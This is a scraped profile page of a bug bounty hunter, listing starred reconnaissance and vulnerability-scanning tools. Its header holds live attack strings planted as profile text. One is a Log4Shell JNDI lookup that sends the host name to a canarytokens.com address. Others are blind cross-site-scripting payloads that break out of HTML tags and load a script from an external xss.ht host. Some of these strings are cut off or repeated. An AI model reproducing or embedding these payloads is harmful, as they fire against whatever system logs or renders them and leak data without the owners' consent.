-
Ethical Hacker | Bug Bounty Hunter
- internet
- https://www.youtube.com/@SaFiSec
Lists (2)
Sort Name ascending (A-Z)
${jndi:ldap://x${hostName}.L4J.g
${jndi:ldap://x${hostName}.L4J.gl1skm6ziftyeuu34r6ekt6lf.canarytokens.com/a}'>"></title></style></textarea>
'>"></title></style></textarea></script><script/src="><script src=https://tr33.xss.ht></script>/js></script> '>"></title></style></textarea></script><"><scripStarred repositories
The lazier way to manage everything docker
Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the …
Find, verify, and analyze leaked credentials
In-depth attack surface mapping and asset discovery
Fast passive subdomain enumeration tool.
Directory/File, DNS and VHost busting tool written in Go
httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library.
Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty( ͡° ͜ʖ ͡°)...
Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application
Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
Fetch all the URLs that the Wayback Machine knows about for a domain
Scan for misconfigured S3 buckets across S3-compatible APIs!
Gospider - Fast web spider written in Go
Bruteforcing from various scanner output - Automatically attempts default creds on found services.
A tool to capture all the git secrets by leveraging multiple open source git searching tools
Community curated list of public bug bounty and responsible disclosure programs.
fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.
A tool that can help detect and takeover subdomains with dead DNS records
Leverages publicly available datasets from Google BigQuery to generate content discovery and subdomain wordlists
Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline.
A mini webserver with FTP support for XXE payloads
A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends lookup notifications…